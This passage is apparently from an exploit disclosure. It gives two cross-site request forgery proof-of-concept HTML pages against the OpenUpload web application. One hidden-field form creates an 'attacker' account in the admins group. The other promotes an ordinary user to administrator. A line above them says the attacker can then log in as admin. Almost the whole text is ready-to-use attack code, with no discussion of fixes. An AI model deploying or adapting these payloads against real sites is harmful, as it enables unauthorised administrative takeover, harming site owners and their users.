Once exploited, the attacker can login as the admin using the username and the password he posted in the form.
======================CSRF POC (Adding New user with Admin Privileges)==================================
CSRF PoC Code
<html>
<head>
<title>Remote Admin Add CSRF Exploit</title>
</head>
<H2>Remote Admin Add CSRF Exploit by b0rn2pwn</H2>
<body>
<form action="http://127.0.0.1/openupload/index.php" method="POST">
<input type="hidden" name="action" value="adminusers" />
<input type="hidden" name="step" value="2" />
<input type="hidden" name="adduserlogin" value="attacker" />
<input type="hidden" name="adduserpassword" value="attacker" />
<input type="hidden" name="adduserrepassword" value="attacker" />
<input type="hidden" name="addusername" value="attacker" />
<input type="hidden" name="adduseremail" value="attacker&#64;gmail&#46;com" />
<input type="hidden" name="addusergroup" value="admins" />
<input type="hidden" name="adduserlang" value="en" />
<input type="hidden" name="adduseractive" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
======================CSRF POC (Changing privileges from normal user to administer)==================================
<html>
<head>
<title>Change privilege normal user to administer CSRF Exploit</title>
</head>
<H2>Change privilege normal user to administer CSRF Exploit by b0rn2pwn</H2>
<body>
<form action="http://127.0.0.1/openupload/index.php" method="POST">
<input type="hidden" name="action" value="adminusers" />
<input type="hidden" name="step" value="3" />
<input type="hidden" name="login" value="normal user" />
<input type="hidden" name="edituserpassword" value="" />
<input type="hidden" name="edituserrepassword" value="" />
<input type="hidden" name="editusername" value="normaluser" />
<input type="hidden" name="edituseremail" value="normaluser&#64;gmail&#46;com" />
<input type="hidden" name="editusergroup" value="admins" />
<input type="hidden" name="edituserlang" value="en" />
<input type="hidden" name="edituseractive" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>